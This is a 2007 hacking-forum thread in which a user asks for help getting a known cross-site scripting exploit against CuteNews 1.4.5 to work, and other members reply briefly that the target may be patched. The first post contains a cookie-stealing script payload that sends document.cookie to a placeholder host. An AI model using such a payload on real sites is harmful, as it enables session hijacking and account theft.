Donate to us via Paypal!
Few are those who can see with their own eyes and hear with their own hearts. - Albert Einstein
Thursday, October 29, 2020
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 115
Guests Online: 112
Members Online: 3

Registered Members: 129475
Newest Member: zdog
Latest Articles

View Thread

HellBound Hackers | Computer General | Web hacking

Author

XSS > Cutenews


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-05-07 03:28
So I was searching for exploits for cutenews 1.4.5 and came across this one http://securityre. . .alert/2286. Not sure if i was allowed to post that, if not, i'm sorry.

I decided to try this on a website that i have admin access of. However, when i put
Code
<script>window.location.href="http://www.site.com/c.ph
p?c="+document.cookie+"";</script>


into the username, it does nothing.

So i tried making a link with javascript, but when i put in the link cutenews puts it as a filename not an external link, example: www.site.com/www.cookielink.com. I don't think cutenews allows external links in the admin panel :\.

I also tried a redirect, but that never worked either.

Can anyone give me any tips? It would be much appreciated.
Author

RE: XSS > Cutenews


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 27-05-07 11:00
Well you lot are about as useless as a dylexic on countdown. Wink
Author

RE: XSS > Cutenews

spyware
Member



Posts: 4192
Location:
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 27-05-07 11:06
Maybe the site is patched.



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
[center]�Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?� - Ebert[/ce
Author

RE: XSS > Cutenews

korg
Member



Posts: 2803
Location: ENDING YOUR ONLINE EXPERIENCE!
Joined: 01.01.06
Rank:
God
Posted on 27-05-07 13:43
Most exploits you find on the web are either patched or outdated,
Unless the sites admin are lazy dumbshit's. Be creative and best you read my sig.


i57.photobucket.com/albums/g215/korg1269/shodan13.jpg

I deal in pain, All life I drain, I dominate, I seal your fate.
O R